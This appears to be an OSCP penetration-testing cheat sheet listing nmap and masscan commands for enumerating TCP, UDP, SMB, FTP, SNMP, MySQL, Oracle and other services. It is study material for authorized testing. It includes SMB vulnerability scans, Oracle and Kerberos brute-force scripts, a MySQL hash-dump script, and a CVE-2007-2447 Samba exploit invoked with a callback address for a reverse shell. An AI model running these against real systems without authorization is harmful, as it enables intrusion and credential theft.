OSCP
Search…
Port & Services Scanning

For TCP Scan - Nmap

1
TCP Scan :
2
3
nmap -Pn -v -sS -A -T4 XXIPXXX
4
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/Documents/XXXX XXIPXXX
5
nmap -sC -sV -vv -oA quick ip
6
nmap -sV -sC -T4 -p- -oA nmap ip
7
nmap -sS -p4555 -sV --reason ip
8
nmap -sS -T4 -sV -oA 00-tcp-top100/top-100 --stats-every 60s --max-retries 3 --defeat-rst-ratelimit --top-ports 100 --script banner --reason solidstate.htb
9
nmap -sS --min-rate 5000 --max-retries 1 -p- ip
10
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp ip
Copied!

MassScan

1
masscan -p1-65535 ip --rate=1000 -e tun0 > ports
2
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
3
nmap -Pn -sV -sC -p$ports ip
Copied!

Full TCP Scan

1
nmap -sC -sV -p- -vv -oA full ip
2
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp ip
3
Copied!

For UDP Scan

1
nmap -sU -sV -p- XXIPXXX
2
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA /root/Documents/XXXX XXIPXXX
3
nmap -sU -sV -vv -oA quick_udp ip
Copied!

Port Knocking

1
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x ip; done
2
Copied!

Port 445, 139 Scan Scripts

1
nmap -p445 --script smb-protocols $IP
2
nmap -p445 --script smb-vuln-ms17-010 $IP
3
nmap $IP -sV -Pn -vv -p 139,445 --script=smb-vuln* --script-args=unsafe=1
4
nmap $IP --script=msrpc-enum
5
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns ip
6
nmap --script vuln -p445 ip
7
8
python usermap_script.py ip 445 ip 1234
9
python usermap_script.py ip 139 ip 1234
10
https://github.com/amriunix/CVE-2007-2447
Copied!

FTP Port 21 Scan Scripts

1
nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $IP
Copied!

SNMP Port 161

1
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP
2
nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP
3
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
Copied!

MYSQL PORT 3306

1
nmap -sV -Pn -vv $IP -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
Copied!

Oracle Port 1521/1560

1
nmap --script=oracle-sid-brute $IP
2
nmap --script=oracle-brute $IP
3
tnscmd10g version -h $IP
Copied!

Finger Port 79

1
finger-user-enum
2
finger-user-enum.pl -U /usr/share/seclist/username/name/name.txt -t
3
Copied!

POP3 Port 110

1
telnet INSERTIPADDRESS 110
2
USER [username]
3
PASS [password]
4
To list messages
5
RETR [message number]
6
7
telnet ip
8
user user
9
pass pw
10
RETR 2
11
Copied!
SSH PORT 22
1
nmap -p22 -n -sV --script ssh2-enum-algos ip
Copied!